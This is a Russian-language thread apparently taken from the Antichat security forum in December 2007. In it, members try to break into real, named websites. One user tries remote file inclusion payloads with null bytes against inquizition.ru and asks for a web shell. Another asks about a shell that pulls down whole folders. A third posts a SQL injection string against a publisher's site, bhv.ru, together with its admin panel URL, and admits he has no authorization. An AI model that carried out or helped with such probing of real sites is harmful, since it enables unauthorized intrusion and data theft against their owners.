ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

30.12.2007, 15:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от bul.666
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет)
а вовторых перед параметром в fopen добавляется 'news/'
если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.12.2007 в 15:35..
|
|
|

30.12.2007, 15:26
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме: 54303
Репутация:
0
|
|
скиньте ссылку на шелл плз
короче может на живом примере что-то увидите))
_http://inquizition.ru/index.php?page=viewcom&newscode='
Последний раз редактировалось HedgeH0g.trj; 30.12.2007 в 15:31..
|
|
|

30.12.2007, 15:48
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме: 54303
Репутация:
0
|
|
Так что, здесь нифига не выйдет?
|
|
|

30.12.2007, 15:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
__________________
Карфаген должен быть разрушен...
|
|
|

30.12.2007, 16:12
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме: 54303
Репутация:
0
|
|
Сообщение от Scipio
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
жопа, блин...сори
|
|
|

31.12.2007, 00:55
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме: 197892
Репутация:
11
|
|
tar cvfz file.tgz /path/
Обьясните как этой командой пользоватся.
Что такое cvfz, /path/
Можно ли какой-то командой заархивировать папку с вложеными файлами?
Или может есть какой-то шелл который выкачивает целые папки???
|
|
|

31.12.2007, 01:16
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Тут все просто tar - программа для архивирования файлов
опция c - говорит что нужно создать архив
опция v - говорит что нужно показать процесс создания
опция f - задает имя файла (file.tgz в твоем случае)
опция z - говорит что нужно сначала сжать файлы, а потом заархивировать (без нее сжатия не будет, а будет просто архивирование)
/path/- это путь до папки которую хочешь заархивировать
__________________
Карфаген должен быть разрушен...
|
|
|

31.12.2007, 04:37
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/
|
|
|

31.12.2007, 04:46
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
Сообщение от o3,14um
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/
это хорошее издательство... не надо...
|
|
|

31.12.2007, 04:55
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
Сообщение от Piflit
это хорошее издательство... не надо...
да я же и не спорю, сам их книги покупаю и на одной из них наткнулся на сайт. Эт так... Спортивный интерес. Потом конечно админам сообщу о баге, а пока интересно проинжектить
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|